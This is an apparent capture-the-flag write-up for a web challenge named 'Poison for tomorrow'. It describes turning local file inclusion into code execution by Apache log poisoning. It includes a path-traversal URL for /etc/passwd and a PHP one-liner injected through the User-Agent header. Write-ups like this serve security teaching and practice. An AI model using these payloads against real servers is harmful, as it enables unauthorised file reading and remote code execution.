Poison for tomorrow
Description
You did it! Everything blew up. Joe is dead, the remaining Warboys ran off. Luckily the anti-apocalypse machine is unharmed. As you walk closer to the machine you see it is counting down from 999 years. Joe programmed it to delay the end of the apocalypse as much as possible. Find a way to reprogram the machine, otherwise, the apocalypse will stay for a long time.
https://poison-for-tomorrow.secchallenge.crysys.hu
- Author: Pepe
- Difficulty: medium
Disclaimer
I did not managed to solve this challenge in the challenge time period, and needed a nudge from Pepe after the challenge ended to be able to solve this one.
Solution
After doing some initial scanning with nmap and skipfish this is what I’ve found.
ls -la
-rw-r--r-- 1 kali kali 142 Feb 27 20:24 solve.txt
cat solve.txt
Ports open:
22 ssh
80 http
443 https
https://poison-for-tomorrow.secchallenge.crysys.hu/index.php?page=/../../../../../../../../../etc/passwd
Nothing to see here right? Right. So anyway, I started playing with the Countdown clock.
Needless to say, I got to nowhere with that, and didn’t managed to solve the challenge.
After the challenge was over I got the hint, that I may want to look into Log Poisoning. About the first search with google returned the answer, LFI to RCE vulnerability. With this knowledge it was easy to put together a python script, that did the following:
- Send a request to
countdown.htmlwith a PHP injectedUser-Agent, our good old PHP one-liner friend will do here too:<?php foreach(scandir(".") as $file) echo $file."<br>"; ?> - View
/var/log/apache2/access.logto see the leaked folder - Look for the flag at
https://poison-for-tomorrow.secchallenge.crysys.hu/index.php?page=/var/www/html/very_secret_hidden_folder_N0P3/flag
… goddammit, the challenge won here, initially.
The acquired flag is:
cd21{HIDDEN}